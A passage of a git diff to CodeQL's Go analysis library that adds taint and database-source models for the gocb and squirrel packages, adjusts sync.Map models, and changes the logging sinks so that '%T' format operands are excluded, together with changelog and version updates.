@@ -9,6 +9,32 @@ extensions: - ["gocb2", "github.com/couchbase/gocb/v2"] - ["gocb2", "gopkg.in/couchbase/gocb.v2"] - ["gocb2", "github.com/couchbaselabs/gocb/v2"] + - addsTo: + pack: codeql/go-all + extensible: sourceModel + data: + - ["group:gocb1", "Cluster", True, "ExecuteAnalyticsQuery", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:gocb1", "Cluster", True, "ExecuteN1qlQuery", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:gocb1", "Cluster", True, "ExecuteSearchQuery", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:gocb2", "Cluster", True, "AnalyticsQuery", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:gocb2", "Cluster", True, "Query", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:gocb2", "Collection", True, "Get", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:gocb2", "Collection", True, "GetAndLock", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:gocb2", "Collection", True, "GetAndTouch", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:gocb2", "Collection", True, "GetAnyReplica", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:gocb2", "Collection", True, "LookupIn", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:gocb2", "Collection", True, "LookupInAllReplicas", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:gocb2", "Collection", True, "LookupInAnyReplica", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:gocb2", "Collection", True, "Scan", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:gocb2", "Scope", True, "AnalyticsQuery", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:gocb2", "Scope", True, "Query", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:gocb2", "TransactionAttemptContext", True, "Get", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:gocb2", "TransactionAttemptContext", True, "GetReplicaFromPreferredServerGroup", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:gocb2", "TransactionAttemptContext", True, "Insert", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:gocb2", "TransactionAttemptContext", True, "Query", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:gocb2", "TransactionAttemptContext", True, "Replace", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:gocb2", "ViewIndexManager", True, "GetAllDesignDocuments", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:gocb2", "ViewIndexManager", True, "GetDesignDocument", "", "", "ReturnValue[0]", "database", "manual"] - addsTo: pack: codeql/go-all extensible: sinkModel @@ -27,6 +53,9 @@ extensions: data: - ["group:gocb1", "", False, "NewAnalyticsQuery", "", "", "Argument[0]", "ReturnValue", "taint", "manual"] - ["group:gocb1", "", False, "NewN1qlQuery", "", "", "Argument[0]", "ReturnValue", "taint", "manual"] + - ["group:gocb1", "AnalyticsResults", True, "One", "", "", "Argument[receiver]", "Argument[0]", "taint", "manual"] + - ["group:gocb1", "AnalyticsResults", True, "Next", "", "", "Argument[receiver]", "Argument[0]", "taint", "manual"] + - ["group:gocb1", "AnalyticsResults", True, "NextBytes", "", "", "Argument[receiver]", "ReturnValue", "taint", "manual"] - ["group:gocb1", "AnalyticsQuery", True, "ContextId", "", "", "Argument[receiver]", "ReturnValue", "taint", "manual"] - ["group:gocb1", "AnalyticsQuery", True, "Deferred", "", "", "Argument[receiver]", "ReturnValue", "taint", "manual"] - ["group:gocb1", "AnalyticsQuery", True, "Pretty", "", "", "Argument[receiver]", "ReturnValue", "taint", "manual"] @@ -43,3 +72,30 @@ extensions: - ["group:gocb1", "N1qlQuery", True, "ReadOnly", "", "", "Argument[receiver]", "ReturnValue", "taint", "manual"] - ["group:gocb1", "N1qlQuery", True, "ScanCap", "", "", "Argument[receiver]", "ReturnValue", "taint", "manual"] - ["group:gocb1", "N1qlQuery", True, "Timeout", "", "", "Argument[receiver]", "ReturnValue", "taint", "manual"] + - ["group:gocb1", "QueryResults", True, "One", "", "", "Argument[receiver]", "Argument[0]", "taint", "manual"] + - ["group:gocb1", "QueryResults", True, "Next", "", "", "Argument[receiver]", "Argument[0]", "taint", "manual"] + - ["group:gocb1", "QueryResults", True, "NextBytes", "", "", "Argument[receiver]", "ReturnValue", "taint", "manual"] + - ["group:gocb1", "SearchResults", True, "Hits", "", "", "Argument[receiver]", "ReturnValue.ArrayElement", "taint", "manual"] + - ["group:gocb2", "AnalyticsResult", True, "One", "", "", "Argument[receiver]", "Argument[0]", "taint", "manual"] + - ["group:gocb2", "AnalyticsResult", True, "Raw", "", "", "Argument[receiver]", "ReturnValue", "taint", "manual"] + - ["group:gocb2", "AnalyticsResult", True, "Row", "", "", "Argument[receiver]", "Argument[0]", "taint", "manual"] + - ["group:gocb2", "AnalyticsResultRaw", True, "NextBytes", "", "", "Argument[receiver]", "ReturnValue", "taint", "manual"] + - ["group:gocb2", "GetResult", True, "Content", "", "", "Argument[receiver]", "Argument[0]", "taint", "manual"] + - ["group:gocb2", "LookupInAllReplicasResult", True, "Next", "", "", "Argument[receiver]", "ReturnValue", "taint", "manual"] + - ["group:gocb2", "LookupInResult", True, "ContentAt", "", "", "Argument[receiver]", "Argument[1]", "taint", "manual"] + - ["group:gocb2", "MutateInResult", True, "ContentAt", "", "", "Argument[receiver]", "Argument[1]", "taint", "manual"] + - ["group:gocb2", "QueryResult", True, "One", "", "", "Argument[receiver]", "Argument[0]", "taint", "manual"] + - ["group:gocb2", "QueryResult", True, "Raw", "", "", "Argument[receiver]", "ReturnValue", "taint", "manual"] + - ["group:gocb2", "QueryResult", True, "Row", "", "", "Argument[receiver]", "Argument[0]", "taint", "manual"] + - ["group:gocb2", "QueryResultRaw", True, "NextBytes", "", "", "Argument[receiver]", "ReturnValue", "taint", "manual"] + - ["group:gocb2", "ScanResult", True, "Next", "", "", "Argument[receiver]", "ReturnValue", "taint", "manual"] + - ["group:gocb2", "ScanResultItem", True, "Content", "", "", "Argument[receiver]", "Argument[0]", "taint", "manual"] + - ["group:gocb2", "SearchResult", True, "Raw", "", "", "Argument[receiver]", "ReturnValue", "taint", "manual"] + - ["group:gocb2", "SearchResult", True, "Row", "", "", "Argument[receiver]", "Argument[0]", "taint", "manual"] + - ["group:gocb2", "SearchResultRaw", True, "NextBytes", "", "", "Argument[receiver]", "ReturnValue", "taint", "manual"] + - ["group:gocb2", "TransactionGetResult", True, "Content", "", "", "Argument[receiver]", "Argument[0]", "taint", "manual"] + - ["group:gocb2", "TransactionQueryResult", True, "One", "", "", "Argument[receiver]", "Argument[0]", "taint", "manual"] + - ["group:gocb2", "TransactionQueryResult", True, "Row", "", "", "Argument[receiver]", "Argument[0]", "taint", "manual"] + - ["group:gocb2", "ViewResult", True, "Raw", "", "", "Argument[receiver]", "ReturnValue", "taint", "manual"] + - ["group:gocb2", "ViewResult", True, "Row", "", "", "Argument[receiver]", "ReturnValue", "taint", "manual"] + - ["group:gocb2", "ViewResultRaw", True, "NextBytes", "", "", "Argument[receiver]", "ReturnValue[0]", "taint", "manual"] diff --git a/go/ql/lib/ext/github.com.mastermind.squirrel.model.yml b/go/ql/lib/ext/github.com.mastermind.squirrel.model.yml deleted file mode 100644 index 6f3c5830e457..000000000000 --- a/go/ql/lib/ext/github.com.mastermind.squirrel.model.yml +++ /dev/null @@ -1,51 +0,0 @@ -extensions: - - addsTo: - pack: codeql/go-all - extensible: packageGrouping - data: - - ["squirrel", "github.com/Masterminds/squirrel"] - - ["squirrel", "gopkg.in/Masterminds/squirrel"] - - ["squirrel", "github.com/lann/squirrel"] - - addsTo: - pack: codeql/go-all - extensible: sinkModel - data: - - ["group:squirrel", "", False, "Delete", "", "", "Argument[0]", "sql-injection", "manual"] - - ["group:squirrel", "", False, "Expr", "", "", "Argument[0]", "sql-injection", "manual"] - - ["group:squirrel", "", False, "Insert", "", "", "Argument[0]", "sql-injection", "manual"] - - ["group:squirrel", "", False, "Select", "", "", "Argument[0]", "sql-injection", "manual"] # TODO: when sources can have access paths, use .ArrayElement - - ["group:squirrel", "", False, "Update", "", "", "Argument[0]", "sql-injection", "manual"] # TODO: when sources can have access paths, use .ArrayElement - - - ["group:squirrel", "DeleteBuilder", True, "From", "", "", "Argument[0]", "sql-injection", "manual"] - - ["group:squirrel", "DeleteBuilder", True, "OrderBy", "", "", "Argument[0]", "sql-injection", "manual"] # TODO: when sources can have access paths, use .ArrayElement - - ["group:squirrel", "DeleteBuilder", True, "Prefix", "", "", "Argument[0]", "sql-injection", "manual"] - - ["group:squirrel", "DeleteBuilder", True, "Suffix", "", "", "Argument[0]", "sql-injection", "manual"] - # DeleteBuilder.Where has to be modeled in QL to avoid FPs when a non-string argument is used - - - ["group:squirrel", "InsertBuilder", True, "Columns", "", "", "Argument[0]", "sql-injection", "manual"] # TODO: when sources can have access paths, use .ArrayElement - - ["group:squirrel", "InsertBuilder", True, "Into", "", "", "Argument[0]", "sql-injection", "manual"] - - ["group:squirrel", "InsertBuilder", True, "Options", "", "", "Argument[0]", "sql-injection", "manual"] # TODO: when sources can have access paths, use .ArrayElement - - ["group:squirrel", "InsertBuilder", True, "Prefix", "", "", "Argument[0]", "sql-injection", "manual"] - - ["group:squirrel", "InsertBuilder", True, "Suffix", "", "", "Argument[0]", "sql-injection", "manual"] - - - ["group:squirrel", "SelectBuilder", True, "CrossJoin", "", "", "Argument[0]", "sql-injection", "manual"] - - ["group:squirrel", "SelectBuilder", True, "Column", "", "", "Argument[0]", "sql-injection", "manual"] - - ["group:squirrel", "SelectBuilder", True, "Columns", "", "", "Argument[0]", "sql-injection", "manual"] # TODO: when sources can have access paths, use .ArrayElement - - ["group:squirrel", "SelectBuilder", True, "From", "", "", "Argument[0]", "sql-injection", "manual"] - - ["group:squirrel", "SelectBuilder", True, "GroupBy", "", "", "Argument[0]", "sql-injection", "manual"] - - ["group:squirrel", "SelectBuilder", True, "InnerJoin", "", "", "Argument[0]", "sql-injection", "manual"] - - ["group:squirrel", "SelectBuilder", True, "LeftJoin", "", "", "Argument[0]", "sql-injection", "manual"] - - ["group:squirrel", "SelectBuilder", True, "Options", "", "", "Argument[0]", "sql-injection", "manual"] # TODO: when sources can have access paths, use .ArrayElement - - ["group:squirrel", "SelectBuilder", True, "OrderBy", "", "", "Argument[0]", "sql-injection", "manual"] # TODO: when sources can have access paths, use .ArrayElement - - ["group:squirrel", "SelectBuilder", True, "Prefix", "", "", "Argument[0]", "sql-injection", "manual"] - - ["group:squirrel", "SelectBuilder", True, "RightJoin", "", "", "Argument[0]", "sql-injection", "manual"] - - ["group:squirrel", "SelectBuilder", True, "Suffix", "", "", "Argument[0]", "sql-injection", "manual"] - # SelectBuilder.Where has to be modeled in QL to avoid FPs when a non-string argument is used - - - ["group:squirrel", "UpdateBuilder", True, "From", "", "", "Argument[0]", "sql-injection", "manual"] - - ["group:squirrel", "UpdateBuilder", True, "OrderBy", "", "", "Argument[0]", "sql-injection", "manual"] # TODO: when sources can have access paths, use .ArrayElement - - ["group:squirrel", "UpdateBuilder", True, "Prefix", "", "", "Argument[0]", "sql-injection", "manual"] - - ["group:squirrel", "UpdateBuilder", True, "Set", "", "", "Argument[0]", "sql-injection", "manual"] - - ["group:squirrel", "UpdateBuilder", True, "Suffix", "", "", "Argument[0]", "sql-injection", "manual"] - - ["group:squirrel", "UpdateBuilder", True, "Table", "", "", "Argument[0]", "sql-injection", "manual"] - # UpdateBuilder.Where has to be modeled in QL to avoid FPs when a non-string argument is used diff --git a/go/ql/lib/ext/github.com.masterminds.squirrel.model.yml b/go/ql/lib/ext/github.com.masterminds.squirrel.model.yml new file mode 100644 index 000000000000..3544f0ac3cfd --- /dev/null +++ b/go/ql/lib/ext/github.com.masterminds.squirrel.model.yml @@ -0,0 +1,84 @@ +extensions: + - addsTo: + pack: codeql/go-all + extensible: packageGrouping + data: + - ["squirrel", "github.com/Masterminds/squirrel"] + - ["squirrel", "gopkg.in/Masterminds/squirrel"] + - ["squirrel", "github.com/lann/squirrel"] + - addsTo: + pack: codeql/go-all + extensible: sourceModel + data: + - ["group:squirrel", "", True, "QueryContextWith", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:squirrel", "", True, "QueryRowContextWith", "", "", "ReturnValue", "database", "manual"] + - ["group:squirrel", "", True, "QueryRowWith", "", "", "ReturnValue", "database", "manual"] + - ["group:squirrel", "", True, "QueryWith", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:squirrel", "DeleteBuilder", True, "Query", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:squirrel", "DeleteBuilder", True, "QueryContext", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:squirrel", "DeleteBuilder", True, "QueryRowContext", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:squirrel", "InsertBuilder", True, "Query", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:squirrel", "InsertBuilder", True, "QueryContext", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:squirrel", "InsertBuilder", True, "QueryRow", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:squirrel", "InsertBuilder", True, "QueryRowContext", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:squirrel", "QueryRower", True, "QueryRow", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:squirrel", "QueryRowerContext", True, "QueryRowContext", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:squirrel", "Queryer", True, "Query", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:squirrel", "QueryerContext", True, "QueryContext", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:squirrel", "SelectBuilder", True, "Query", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:squirrel", "SelectBuilder", True, "QueryContext", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:squirrel", "SelectBuilder", True, "QueryRow", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:squirrel", "SelectBuilder", True, "QueryRowContext", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:squirrel", "StdSql", True, "Query", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:squirrel", "StdSql", True, "QueryRow", "", "", "ReturnValue", "database", "manual"] + - ["group:squirrel", "StdSqlCtx", True, "QueryContext", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:squirrel", "StdSqlCtx", True, "QueryRowContext", "", "", "ReturnValue", "database", "manual"] + - ["group:squirrel", "UpdateBuilder", True, "Query", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:squirrel", "UpdateBuilder", True, "QueryContext", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:squirrel", "UpdateBuilder", True, "QueryRow", "", "", "ReturnValue[0]", "database", "manual"] + - ["group:squirrel", "UpdateBuilder", True, "QueryRowContext", "", "", "ReturnValue[0]", "database", "manual"] + - addsTo: + pack: codeql/go-all + extensible: sinkModel + data: + - ["group:squirrel", "", False, "Delete", "", "", "Argument[0]", "sql-injection", "manual"] + - ["group:squirrel", "", False, "Expr", "", "", "Argument[0]", "sql-injection", "manual"] + - ["group:squirrel", "", False, "Insert", "", "", "Argument[0]", "sql-injection", "manual"] + - ["group:squirrel", "", False, "Select", "", "", "Argument[0]", "sql-injection", "manual"] # TODO: when sources can have access paths, use .ArrayElement + - ["group:squirrel", "", False, "Update", "", "", "Argument[0]", "sql-injection", "manual"] # TODO: when sources can have access paths, use .ArrayElement + + - ["group:squirrel", "DeleteBuilder", True, "From", "", "", "Argument[0]", "sql-injection", "manual"] + - ["group:squirrel", "DeleteBuilder", True, "OrderBy", "", "", "Argument[0]", "sql-injection", "manual"] # TODO: when sources can have access paths, use .ArrayElement + - ["group:squirrel", "DeleteBuilder", True, "Prefix", "", "", "Argument[0]", "sql-injection", "manual"] + - ["group:squirrel", "DeleteBuilder", True, "Suffix", "", "", "Argument[0]", "sql-injection", "manual"] + # DeleteBuilder.Where has to be modeled in QL to avoid FPs when a non-string argument is used + + - ["group:squirrel", "InsertBuilder", True, "Columns", "", "", "Argument[0]", "sql-injection", "manual"] # TODO: when sources can have access paths, use .ArrayElement + - ["group:squirrel", "InsertBuilder", True, "Into", "", "", "Argument[0]", "sql-injection", "manual"] + - ["group:squirrel", "InsertBuilder", True, "Options", "", "", "Argument[0]", "sql-injection", "manual"] # TODO: when sources can have access paths, use .ArrayElement + - ["group:squirrel", "InsertBuilder", True, "Prefix", "", "", "Argument[0]", "sql-injection", "manual"] + - ["group:squirrel", "InsertBuilder", True, "Suffix", "", "", "Argument[0]", "sql-injection", "manual"] + + - ["group:squirrel", "SelectBuilder", True, "CrossJoin", "", "", "Argument[0]", "sql-injection", "manual"] + - ["group:squirrel", "SelectBuilder", True, "Column", "", "", "Argument[0]", "sql-injection", "manual"] + - ["group:squirrel", "SelectBuilder", True, "Columns", "", "", "Argument[0]", "sql-injection", "manual"] # TODO: when sources can have access paths, use .ArrayElement + - ["group:squirrel", "SelectBuilder", True, "From", "", "", "Argument[0]", "sql-injection", "manual"] + - ["group:squirrel", "SelectBuilder", True, "GroupBy", "", "", "Argument[0]", "sql-injection", "manual"] + - ["group:squirrel", "SelectBuilder", True, "InnerJoin", "", "", "Argument[0]", "sql-injection", "manual"] + - ["group:squirrel", "SelectBuilder", True, "LeftJoin", "", "", "Argument[0]", "sql-injection", "manual"] + - ["group:squirrel", "SelectBuilder", True, "Options", "", "", "Argument[0]", "sql-injection", "manual"] # TODO: when sources can have access paths, use .ArrayElement + - ["group:squirrel", "SelectBuilder", True, "OrderBy", "", "", "Argument[0]", "sql-injection", "manual"] # TODO: when sources can have access paths, use .ArrayElement + - ["group:squirrel", "SelectBuilder", True, "Prefix", "", "", "Argument[0]", "sql-injection", "manual"] + - ["group:squirrel", "SelectBuilder", True, "RightJoin", "", "", "Argument[0]", "sql-injection", "manual"] + - ["group:squirrel", "SelectBuilder", True, "Suffix", "", "", "Argument[0]", "sql-injection", "manual"] + # SelectBuilder.Where has to be modeled in QL to avoid FPs when a non-string argument is used + + - ["group:squirrel", "UpdateBuilder", True, "From", "", "", "Argument[0]", "sql-injection", "manual"] + - ["group:squirrel", "UpdateBuilder", True, "OrderBy", "", "", "Argument[0]", "sql-injection", "manual"] # TODO: when sources can have access paths, use .ArrayElement + - ["group:squirrel", "UpdateBuilder", True, "Prefix", "", "", "Argument[0]", "sql-injection", "manual"] + - ["group:squirrel", "UpdateBuilder", True, "Set", "", "", "Argument[0]", "sql-injection", "manual"] + - ["group:squirrel", "UpdateBuilder", True, "Suffix", "", "", "Argument[0]", "sql-injection", "manual"] + - ["group:squirrel", "UpdateBuilder", True, "Table", "", "", "Argument[0]", "sql-injection", "manual"] + # UpdateBuilder.Where has to be modeled in QL to avoid FPs when a non-string argument is used + + # There are summary models for Row.Scan, RowScanner.Scan, {Insert,Delete,Select,Update}Builder.Scan and {Insert,Delete,Select,Update}Builder.ScanContext modeled in QL diff --git a/go/ql/lib/ext/sync.model.yml b/go/ql/lib/ext/sync.model.yml index da03ce0acc27..5a318552f531 100644 --- a/go/ql/lib/ext/sync.model.yml +++ b/go/ql/lib/ext/sync.model.yml @@ -6,10 +6,10 @@ extensions: - ["sync", "Map", True, "CompareAndSwap", "", "", "Argument[2]", "Argument[receiver]", "taint", "manual"] - ["sync", "Map", True, "Load", "", "", "Argument[receiver]", "ReturnValue[0]", "taint", "manual"] - ["sync", "Map", True, "LoadOrStore", "", "", "Argument[receiver]", "ReturnValue[0]", "taint", "manual"] - - ["sync", "Map", True, "LoadOrStore", "", "", "Argument[0..1]", "Argument[receiver]", "taint", "manual"] - - ["sync", "Map", True, "LoadOrStore", "", "", "Argument[0..1]", "ReturnValue[0]", "taint", "manual"] - - ["sync", "Map", True, "Store", "", "", "Argument[0..1]", "Argument[receiver]", "taint", "manual"] + - ["sync", "Map", True, "LoadOrStore", "", "", "Argument[1]", "Argument[receiver]", "taint", "manual"] + - ["sync", "Map", True, "LoadOrStore", "", "", "Argument[1]", "ReturnValue[0]", "taint", "manual"] + - ["sync", "Map", True, "Store", "", "", "Argument[1]", "Argument[receiver]", "taint", "manual"] - ["sync", "Map", True, "Swap", "", "", "Argument[receiver]", "ReturnValue[0]", "taint", "manual"] - - ["sync", "Map", True, "Swap", "", "", "Argument[0..1]", "Argument[receiver]", "taint", "manual"] + - ["sync", "Map", True, "Swap", "", "", "Argument[1]", "Argument[receiver]", "taint", "manual"] - ["sync", "Pool", True, "Get", "", "", "Argument[receiver]", "ReturnValue", "taint", "manual"] - ["sync", "Pool", True, "Put", "", "", "Argument[0]", "Argument[receiver]", "taint", "manual"] diff --git a/go/ql/lib/go.qll b/go/ql/lib/go.qll index df725017dc85..51ff4916e16f 100644 --- a/go/ql/lib/go.qll +++ b/go/ql/lib/go.qll @@ -57,6 +57,7 @@ import semmle.go.frameworks.Protobuf import semmle.go.frameworks.Revel import semmle.go.frameworks.Spew import semmle.go.frameworks.SQL +import semmle.go.frameworks.Squirrel import semmle.go.frameworks.Stdlib import semmle.go.frameworks.SystemCommandExecutors import semmle.go.frameworks.Testing diff --git a/go/ql/lib/qlpack.yml b/go/ql/lib/qlpack.yml index 795008cc29c9..487e9205e728 100644 --- a/go/ql/lib/qlpack.yml +++ b/go/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/go-all -version: 4.2.1 +version: 4.2.2 groups: go dbscheme: go.dbscheme extractor: go diff --git a/go/ql/lib/semmle/go/Concepts.qll b/go/ql/lib/semmle/go/Concepts.qll index 3f0cd0f8885e..1931f16871ab 100644 --- a/go/ql/lib/semmle/go/Concepts.qll +++ b/go/ql/lib/semmle/go/Concepts.qll @@ -357,6 +357,23 @@ module RegexpReplaceFunction { class LoggerCall extends DataFlow::Node instanceof LoggerCall::Range { /** Gets a node that is a part of the logged message. */ DataFlow::Node getAMessageComponent() { result = super.getAMessageComponent() } + + /** + * Gets a node whose value is a part of the logged message. + * + * Components corresponding to the format specifier "%T" are excluded as + * their type is logged rather than their value. + */ + DataFlow::Node getAValueFormattedMessageComponent() { + result = this.getAMessageComponent() and + not exists(string formatSpecifier | + result = this.(StringOps::Formatting::StringFormatCall).getOperand(_, formatSpecifier) and + // We already know that `formatSpecifier` starts with `%`, so we check + // that it ends with `T` to confirm that it is `%T` or possibly some + // variation on it. + formatSpecifier.matches("%T") + ) + } } /** Provides a class for modeling new logging APIs. */ diff --git a/go/ql/lib/semmle/go/frameworks/Squirrel.qll b/go/ql/lib/semmle/go/frameworks/Squirrel.qll new file mode 100644 index 000000000000..c7d75003cfe7 --- /dev/null +++ b/go/ql/lib/semmle/go/frameworks/Squirrel.qll @@ -0,0 +1,85 @@ +/** + * Provides classes modeling security-relevant aspects of the `squirrel` ORM package. + */ + +import go + +/** + * Provides classes modeling security-relevant aspects of the `squirrel` ORM package. + */ +module Squirrel { + private string packagePath() { + result = + package([ + "github.com/Masterminds/squirrel", + "github.com/lann/squirrel", + "gopkg.in/Masterminds/squirrel", + ], "") + } + + private class RowScan extends TaintTracking::FunctionModel, Method { + FunctionInput inp; + FunctionOutput outp; + + RowScan() { + // signature: func (r *Row) Scan(dest ...interface{}) error + this.hasQualifiedName(packagePath(), "Row", "Scan") and + inp.isReceiver() and + outp.isParameter(_) + } + + override predicate hasTaintFlow(FunctionInput input, FunctionOutput output) { + input = inp and output = outp + } + } + + private class RowScannerScan extends TaintTracking::FunctionModel, Method { + FunctionInput inp; + FunctionOutput outp; + + RowScannerScan() { + // signature: func (rs *RowScanner) Scan(dest ...interface{}) error + this.hasQualifiedName(packagePath(), "RowScanner", "Scan") and + inp.isReceiver() and + outp.isParameter(_) + } + + override predicate hasTaintFlow(FunctionInput input, FunctionOutput output) { + input = inp and output = outp + } + } + + private class BuilderScan extends TaintTracking::FunctionModel, Method { + FunctionInput inp; + FunctionOutput outp; + + BuilderScan() { + // signature: func (b {Insert,Delete,Select,Update}Builder) Scan(dest ...interface{}) error + this.hasQualifiedName(packagePath(), + ["DeleteBuilder", "InsertBuilder", "SelectBuilder", "UpdateBuilder"], "Scan") and + inp.isReceiver() and + outp.isParameter(_) + } + + override predicate hasTaintFlow(FunctionInput input, FunctionOutput output) { + input = inp and output = outp + } + } + + private class BuilderScanContext extends TaintTracking::FunctionModel, Method { + FunctionInput inp; + FunctionOutput outp; + + BuilderScanContext() { + // signature: func (b {Insert,Delete,Select,Update}Builder) ScanContext(ctx context.Context, dest ...interface{}) error + this.hasQualifiedName(packagePath(), + ["DeleteBuilder", "InsertBuilder", "SelectBuilder", "UpdateBuilder"], "ScanContext") and + inp.isReceiver() and + exists(int i | i > 0 | outp.isParameter(i)) + } + + override predicate hasTaintFlow(FunctionInput input, FunctionOutput output) { + input = inp and output = outp + } + } +} diff --git a/go/ql/lib/semmle/go/security/CleartextLoggingCustomizations.qll b/go/ql/lib/semmle/go/security/CleartextLoggingCustomizations.qll index 17a7345b23e7..6c95686cb8c8 100644 --- a/go/ql/lib/semmle/go/security/CleartextLoggingCustomizations.qll +++ b/go/ql/lib/semmle/go/security/CleartextLoggingCustomizations.qll @@ -40,7 +40,7 @@ module CleartextLogging { * An argument to a logging mechanism. */ class LoggerSink extends Sink { - LoggerSink() { this = any(LoggerCall log).getAMessageComponent() } + LoggerSink() { this = any(LoggerCall log).getAValueFormattedMessageComponent() } } /** diff --git a/go/ql/lib/semmle/go/security/LogInjectionCustomizations.qll b/go/ql/lib/semmle/go/security/LogInjectionCustomizations.qll index 188256f9643b..565cf29a4508 100644 --- a/go/ql/lib/semmle/go/security/LogInjectionCustomizations.qll +++ b/go/ql/lib/semmle/go/security/LogInjectionCustomizations.qll @@ -35,7 +35,7 @@ module LogInjection { /** An argument to a logging mechanism. */ class LoggerSink extends Sink { - LoggerSink() { this = any(LoggerCall log).getAMessageComponent() } + LoggerSink() { this = any(LoggerCall log).getAValueFormattedMessageComponent() } } /** diff --git a/go/ql/src/CHANGELOG.md b/go/ql/src/CHANGELOG.md index fb033ceb26ce..ff91b3d9ce83 100644 --- a/go/ql/src/CHANGELOG.md +++ b/go/ql/src/CHANGELOG.md @@ -1,3 +1,9 @@ +## 1.1.11 + +### Minor Analysis Improvements + +* False positives in "Log entries created from user input" (`go/log-injection`) and "Clear-text logging of sensitive information" (`go/clear-text-logging`) which involved the verb `%T` in a format specifier have been fixed. As a result, some users may also see more alerts from the "Use of constant `state` value in OAuth 2.0 URL" (`go/constant-oauth2-state`) query. + ## 1.1.10 No user-facing changes. diff --git a/go/ql/src/InconsistentCode/UnhandledCloseWritableHandle.ql b/go/ql/src/InconsistentCode/UnhandledCloseWritableHandle.ql index 8846f52fb743..211cf4b3985e 100644 --- a/go/ql/src/InconsistentCode/UnhandledCloseWritableHandle.ql +++ b/go/ql/src/InconsistentCode/UnhandledCloseWritableHandle.ql @@ -97,6 +97,7 @@ predicate isCloseSink(DataFlow::Node sink, DataFlow::CallNode closeCall) { // where the function is called on the sink closeCall.getReceiver() = sink and // and check that it is not dominated by a call to `os.File.Sync`. + // TODO: fix this logic when `closeCall` is in a defer statement. not exists(IR::Instruction syncInstr, DataFlow::Node syncReceiver, DataFlow::CallNode syncCall | // match the instruction corresponding to an `os.File.Sync` call with the predecessor syncCall.asInstruction() = syncInstr and diff --git a/go/ql/src/Security/CWE-352/ConstantOauth2State.ql b/go/ql/src/Security/CWE-352/ConstantOauth2State.ql index daaac1ce4f3b..31b6907ffddf 100644 --- a/go/ql/src/Security/CWE-352/ConstantOauth2State.ql +++ b/go/ql/src/Security/CWE-352/ConstantOauth2State.ql @@ -138,7 +138,9 @@ predicate privateUrlFlowsToAuthCodeUrlCall(DataFlow::CallNode call) { module FlowToPrintConfig implements DataFlow::ConfigSig { additional predicate isSinkCall(DataFlow::Node sink, DataFlow::CallNode call) { - exists(LoggerCall logCall | call = logCall | sink = logCall.getAMessageComponent()) + exists(LoggerCall logCall | call = logCall | + sink = logCall.getAValueFormattedMessageComponent() + ) } predicate isSource(DataFlow::Node source) { source = any(AuthCodeUrl m).getACall().getResult() } diff --git a/go/ql/src/change-notes/released/1.1.11.md b/go/ql/src/change-notes/released/1.1.11.md new file mode 100644 index 000000000000..44dc87cea8c2 --- /dev/null +++ b/go/ql/src/change-notes/released/1.1.11.md @@ -0,0 +1,5 @@ +## 1.1.11 + +### Minor Analysis Improvements + +* False positives in "Log entries created from user input" (`go/log-injection`) and "Clear-text logging of sensitive information" (`go/clear-text-logging`) which involved the verb `%T` in a format specifier have been fixed. As a result, some users may also see more alerts from the "Use of constant `state` value in OAuth 2.0 URL" (`go/constant-oauth2-state`) query. diff --git a/go/ql/src/codeql-pack.release.yml b/go/ql/src/codeql-pack.release.yml index 4c01918d4144..121f8cf035d3 100644 --- a/go/ql/src/codeql-pack.release.yml +++ b/go/ql/src/codeql-pack.release.yml @@ -1,2 +1,2 @@ --- -lastReleaseVersion: 1.1.10 +lastReleaseVersion: 1.1.11 diff --git a/go/ql/src/codeql-suites/go-ccr.qls b/go/ql/src/codeql-suites/go-code-quality.qls similarity index 100% rename from go/ql/src/codeql-suites/go-ccr.qls rename to go/ql/src/codeql-suites/go-code-quality.qls diff --git a/go/ql/src/qlpack.yml b/go/ql/src/qlpack.yml index adf45a0fd071..514a7809b7fa 100644 --- a/go/ql/src/qlpack.yml +++ b/go/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/go-queries -version: 1.1.10 +version: 1.1.11 groups: - go - queries diff --git a/go/ql/test/library-tests/semmle/go/concepts/LoggerCall/LoggerCall.ql b/go/ql/test/library-tests/semmle/go/concepts/LoggerCall/LoggerCall.ql index 7eef263ec830..11680579012a 100644 --- a/go/ql/test/library-tests/semmle/go/concepts/LoggerCall/LoggerCall.ql +++ b/go/ql/test/library-tests/semmle/go/concepts/LoggerCall/LoggerCall.ql @@ -4,14 +4,20 @@ import ModelValidation import 